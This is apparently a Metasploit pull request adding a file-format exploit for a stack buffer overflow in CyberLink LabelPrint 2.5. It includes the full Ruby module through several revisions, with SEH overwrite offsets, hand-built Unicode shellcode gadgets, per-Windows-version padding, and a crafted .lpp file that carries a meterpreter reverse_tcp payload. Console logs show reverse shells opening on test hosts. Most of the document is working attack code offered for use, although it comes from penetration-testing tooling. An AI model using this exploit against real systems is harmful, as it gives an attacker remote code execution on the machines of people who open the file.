### PR TITLE
Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md
+++ b/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md
@@ -1,0 +1,71 @@
+## Description
+
+This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+via open file menu. This results in overwriting a structured exception handler record and take over the
+application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
+
+## Vulnerable Application
+
+CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html)
+
+## Verification Steps
+
+1. `./msfconsole`
+2. `use exploit/multi/handler`
+3. `set payload windows/meterpreter/reverse_tcp`
+4. `set lhost <lhost>`
+5. `set exitonsession false`
+6. `exploit -j`
+7. `use windows/fileformat/cyberlink_lpp_bof`
+8. `set lhost <lhost>`
+9. `set target 2`
+10. `exploit`
+11. Copy file to Win10 host and open in vulnerable software
+12. Get a shell
+
+## Scenarios
+
+### Tested Windows 10 x64 running CyberLink LabelPrint v2.5
+
+```
+msf5 > use exploit/multi/handler
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 172.22.222.132 
+lhost => 172.22.222.132
+msf5 exploit(multi/handler) > set exitonsession false
+exitonsession => false
+msf5 exploit(multi/handler) > exploit -j
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/handler) >
+[*] Started reverse TCP handler on 172.22.222.132:4444
+use windows/fileformat/cyberlink_lpp_bof
+msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 
+lhost => 172.22.222.132
+msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
+target => 2
+msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit
+
+[*] Creating 'msf.lpp' file ...
+[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
+msf5 exploit(windows/fileformat/cyberlink_lpp_bof) >
+[*] Sending stage (179779 bytes) to 172.22.222.200
+[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
+sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-IPOGIJR
+OS              : Windows 10 (Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
+```

--- a/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
@@ -7,16 +7,15 @@ class MetasploitModule < Msf::Exploit
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Seh
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
       'Description'    => %q{
-       This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
-       The vulnerability is triggered when opening a .lpp project file containing overly long string characters
-       via open file menu. This results in overwriting a structured exception handler record and take over the
-       application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
+        This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+        The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+        via open file menu. This results in overwriting a structured exception handler record and take over the
+        application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
       },
       'License'         => MSF_LICENSE,
       'Author'          =>
@@ -31,6 +30,7 @@ class MetasploitModule < Msf::Exploit
         ],
       'DefaultOptions'  =>
         {
+          'FILENAME' => 'msf.lpp',
           'EXITFUNC' => 'seh',
           'DisablePayloadHandler' => 'true',
           'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@@ -66,23 +66,16 @@ class MetasploitModule < Msf::Exploit
       'Payload'         =>
         {
           'Space'       => 15000,
-          'BadChars'    => "\x00", #badchars starts from \x80 to \xff
           'DisableNops' => true
         },
       'DisclosureDate'  => 'Sep 23 2017',
       'DefaultTarget'   => 0))
-
-    register_options(
-    [
-      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
-    ])
   end
 
   def get_payload(hunter)
-      enc = framework.encoders.create('x86/unicode_mixed')
-      enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
-      hunter = enc.encode(hunter, nil, nil, platform)
-  return hunter
+    enc = framework.encoders.create('x86/unicode_mixed')
+    enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+    hunter = enc.encode(hunter, nil, nil, platform)
   end
 
   def exploit

--- a/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
@@ -16,13 +16,13 @@ class MetasploitModule < Msf::Exploit
        This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
        The vulnerability is triggered when opening a .lpp project file containing overly long string characters
        via open file menu. This results in overwriting a structured exception handler record and take over the
-       application. This module has been tested on Windows 7x64.
+       application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
       },
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
           'modpr0be <tom@spentera.id>',       # initial discovery and metasploit module
-          'f3ci <marie@spentera.id>'            # unicode kungfu
+          'f3ci <marie@spentera.id>'          # unicode kungfu
         ],
       'References'      =>
         [
@@ -32,17 +32,41 @@ class MetasploitModule < Msf::Exploit
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'seh',
-          'DisablePayloadHandler' => 'true'
+          'DisablePayloadHandler' => 'true',
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
         },
       'Platform'        => 'win',
       'Targets'         =>
         [
-          ['CyberLink LabelPrint <= 2.5 (Win 7x64)', { 'Ret' => "\x2c\x44", 'Offset' => 790 } ]
+          ['CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)',
+            {
+              'Ret' => "\x2c\x44",
+              'Offset' => 790,
+              'Padding1' => 857,
+              'Padding2' => 104
+            }
+          ],
+          ['CyberLink LabelPrint <= 2.5 on Windows 8.1 x64',
+            {
+              'Ret' => "\x2c\x44",
+              'Offset' => 790,
+              'Padding1' => 845,
+              'Padding2' => 116
+            }
+          ],
+          ['CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803',
+            {
+              'Ret' => "\x2c\x44",
+              'Offset' => 790,
+              'Padding1' => 781,
+              'Padding2' => 180
+            }
+          ],
         ],
       'Payload'         =>
         {
           'Space'       => 15000,
-          'BadChars'    => "\x00",    #badchars starts from 80 until the rest of it.
+          'BadChars'    => "\x00", #badchars starts from \x80 to \xff
           'DisableNops' => true
         },
       'DisclosureDate'  => 'Sep 23 2017',
@@ -55,34 +79,28 @@ class MetasploitModule < Msf::Exploit
   end
 
   def get_payload(hunter)
-
-    [ 'x86/unicode_mixed' ].each { |name|
-      enc = framework.encoders.create(name)
-      if name =~ /unicode/
-        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
-        hunter = enc.encode(hunter, nil, nil, platform)
-      end
-    }
-
-    return hunter
+      enc = framework.encoders.create('x86/unicode_mixed')
+      enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+      hunter = enc.encode(hunter, nil, nil, platform)
+  return hunter
   end
 
   def exploit
     nop = "\x42"
-    junk = "\x41"              #junk must specifically static, put A as example
+    junk = 'ABC'.split('').sample              #junk must specifically static (A, B, and C only)
     buffer = ""
     buffer << junk * target['Offset']
     buffer << "\x61\x42"       # nseh
     buffer << target['Ret']    # seh
 
-    #we need to encode the RET address, since C3 is known bad char.
-    #preparing address for the decoded RET
+    #we need to encode the RET address, since RET (\xc3) is known as bad char.
+    #preparing address to land the decoded RET
     buffer << nop              #nop/inc edx
     buffer << "\x54"           #push esp
     buffer << nop              #nop/inc edx
     buffer << "\x58"           #pop eax
     buffer << nop              #nop/inc edx
-    buffer << "\x05\x1B\x01"   #add eax 01001B00 universal
+    buffer << "\x05\x1B\x01"   #add eax 01001B00
     buffer << nop              #nop/inc edx
     buffer << "\x2d\x01\x01"   #sub eax 01001000
     buffer << nop              #nop/inc edx
@@ -90,7 +108,7 @@ class MetasploitModule < Msf::Exploit
     buffer << nop              #nop/inc edx
     buffer << "\x5c"           #pop esp
 
-    #preparing ret opcode
+    #preparing RET opcode (c300c300)
     buffer << nop              #nop/inc edx
     buffer << "\x25\x7e\x7e"   #and eax,7e007e00
     buffer << nop              #nop/inc edx
@@ -100,10 +118,10 @@ class MetasploitModule < Msf::Exploit
     buffer << nop              #nop/inc edx
     buffer << "\x05\x44\x44"   #add eax,44004400
     buffer << nop              #nop/inc edx
-    buffer << "\x57"           #push edi
+    buffer << "\x57"           #push edi as padding, needed to align stack
     buffer << nop              #nop/inc edx
     buffer << "\x50"           #push eax
-    buffer << junk * 857       #depending OS
+    buffer << junk * target['Padding1'] #OS specific
 
     #custom venetian to reach shellcode
     buffer << "\x58"           #pop eax
@@ -112,12 +130,12 @@ class MetasploitModule < Msf::Exploit
     buffer << nop              #nop/inc edx
     buffer << "\x05\x09\x01"   #depending OS
     buffer << nop              #nop/inc edx
-    buffer << "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
+    buffer << "\x2d\x01\x01"   #add eax, 01000100, this will align eax to our buffer
     buffer << nop              #nop/inc edx
     buffer << "\x50"           #push eax
     buffer << nop              #nop/inc edx
 
-    #crafting call esp 0x7c32537b MFC71U.dll
+    #crafting call esp at 0x7c32537b (MFC71U.dll) to make a jump using call esp
     buffer << "\x5C"           #pop esp
     buffer << nop              #nop/inc edx
     buffer << "\x58"           #pop eax
@@ -125,11 +143,11 @@ class MetasploitModule < Msf::Exploit
     buffer << "\x05\x53\x7c"   #add eax 7c005300 part of call esp
     buffer << nop              #nop/inc edx
     buffer << "\x50"           #push eax
-    buffer << junk * 104       #depending OS
+    buffer << junk * target['Padding2'] #OS specific
     buffer << "\x7b\x32"       #part of call esp
 
-    #preparing for shellcode
-    buffer << nop * 114        #junk
+    #preparing for jump to shellcode, placing in eax.
+    buffer << junk * 114       #junk
     buffer << "\x57"           #push edi
     buffer << nop              #nop/inc edx
     buffer << "\x58"           #pop eax
@@ -139,11 +157,11 @@ class MetasploitModule < Msf::Exploit
     buffer << "\x2d\x01\x01"   #sub eax,01000100
     buffer << nop              #nop/inc edx
     buffer << get_payload(payload.encoded)
-    buffer << junk * 4090      #fill the rest of buffer, must be added.
+    buffer << junk * (payload.space-buffer.length)      #fill the rest of buffer, must be added.
 
     lpp_data = <<-EOS
     <PROJECT version="1.0.00">
-      <INFORMATION title="" author="" date="1/1/1970" SystemTime="1/1/1970">
+      <INFORMATION title="" author="" date="#{rand(1..12)}/#{rand(1..28)}/#{(1970..2020).to_a.sample}" SystemTime="#{rand(1..12)}/#{rand(1..28)}/#{(1970..2020).to_a.sample}">
         <TRACK name="#{buffer}" />
       </INFORMATION>
     </PROJECT>

--- a/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
@@ -1,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+       The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+       via open file menu. This results in overwriting a structured exception handler record and take over the
+       application. This module has been tested on Windows 7x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'modpr0be <tom@spentera.id>',       # initial discovery and metasploit module
+          'f3ci <marie@spentera.id>'            # unicode kungfu
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-14627' ],
+          [ 'EDB', '42777' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          ['CyberLink LabelPrint <= 2.5 (Win 7x64)', { 'Ret' => "\x2c\x44", 'Offset' => 790 } ]
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 15000,
+          'BadChars'    => "\x00",    #badchars starts from 80 until the rest of it.
+          'DisableNops' => true
+        },
+      'DisclosureDate'  => 'Sep 23 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
+    ])
+  end
+
+  def get_payload(hunter)
+
+    [ 'x86/unicode_mixed' ].each { |name|
+      enc = framework.encoders.create(name)
+      if name =~ /unicode/
+        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+        hunter = enc.encode(hunter, nil, nil, platform)
+      end
+    }
+
+    return hunter
+  end
+
+  def exploit
+    nop = "\x42"
+    junk = "\x41"              #junk must specifically static, put A as example
+    buffer = ""
+    buffer << junk * target['Offset']
+    buffer << "\x61\x42"       # nseh
+    buffer << target['Ret']    # seh
+
+    #we need to encode the RET address, since C3 is known bad char.
+    #preparing address for the decoded RET
+    buffer << nop              #nop/inc edx
+    buffer << "\x54"           #push esp
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x1B\x01"   #add eax 01001B00 universal
+    buffer << nop              #nop/inc edx
+    buffer << "\x2d\x01\x01"   #sub eax 01001000
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x5c"           #pop esp
+
+    #preparing ret opcode
+    buffer << nop              #nop/inc edx
+    buffer << "\x25\x7e\x7e"   #and eax,7e007e00
+    buffer << nop              #nop/inc edx
+    buffer << "\x25\x01\x01"   #and eax,01000100
+    buffer << nop              #nop/inc edx
+    buffer << "\x35\x7f\x7f"   #xor eax,7f007f00
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x44\x44"   #add eax,44004400
+    buffer << nop              #nop/inc edx
+    buffer << "\x57"           #push edi
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << junk * 857       #depending OS
+
+    #custom venetian to reach shellcode
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x09\x01"   #depending OS
+    buffer << nop              #nop/inc edx
+    buffer << "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << nop              #nop/inc edx
+
+    #crafting call esp 0x7c32537b MFC71U.dll
+    buffer << "\x5C"           #pop esp
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x53\x7c"   #add eax 7c005300 part of call esp
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << junk * 104       #depending OS
+    buffer << "\x7b\x32"       #part of call esp
+
+    #preparing for shellcode
+    buffer << nop * 114        #junk
+    buffer << "\x57"           #push edi
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x0A\x01"   #depending OS
+    buffer << nop              #nop/inc edx
+    buffer << "\x2d\x01\x01"   #sub eax,01000100
+    buffer << nop              #nop/inc edx
+    buffer << get_payload(payload.encoded)
+    buffer << junk * 4090      #fill the rest of buffer, must be added.
+
+    lpp_data = <<-EOS
+    <PROJECT version="1.0.00">
+      <INFORMATION title="" author="" date="1/1/1970" SystemTime="1/1/1970">
+        <TRACK name="#{buffer}" />
+      </INFORMATION>
+    </PROJECT>
+    EOS
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(lpp_data)
+  end
+end


### PR DESCRIPTION
Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) module based on [EDB-42777](https://www.exploit-db.com/exploits/42777/).

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing overly long string characters via open file menu. This results in overwriting a structured exception handler record and take over the application. This module has been tested on Windows 7x64

- Homepage: http://www.cyberlink.com/
- Source (CyberLink LabelPrint is part of CyberLink Power2Go. This link below will download CyberLink Power2Go first): 
   - https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html (downloader, it will download the main application after you run this)
- Tested on: Windows 7 x64

Verification
---
   

- [x] Run the downloader/installer (It will download the installer and install the CyberLink Power2Go, LabelPrint, and WaveEditor)
- [x] Run msfconsole and the exploit module prepare for handler
- [x] Send the file to the target machine
- [x] Open CyberLink LabelPrint, go to Open -> Choose the msf.lpp -> shell/calc.

![proof image](http://oi68.tinypic.com/2hye6wk.jpg)

## Generate msf.lpp example and handler output (tested on Windows 7 x64)
```
[*] Processing labelprint.rc for ERB directives.
resource (labelprint.rc)> use exploits/windows/fileformat/cyberlink_lpp_bof.rb
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /root/.msf4/local/msf.lpp
resource (labelprint.rc)> use exploits/multi/handler
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Started reverse TCP handler on 192.168.240.129:4444 
[*] Sending stage (179779 bytes) to 192.168.240.131
[*] Meterpreter session 1 opened (192.168.240.129:4444 -> 192.168.240.131:49598) at 2018-11-29 08:17:23 -0500

meterpreter >
```

NOTE: I used a dirty technique to reach the shellcode and it works. For now, it specifically works on Windows 7x64. I managed to make it works on Windows 10 as well, but I need to change some padding characters to reach the shellcode. 

If you guys know shortest path, it would be an honor to learn from it.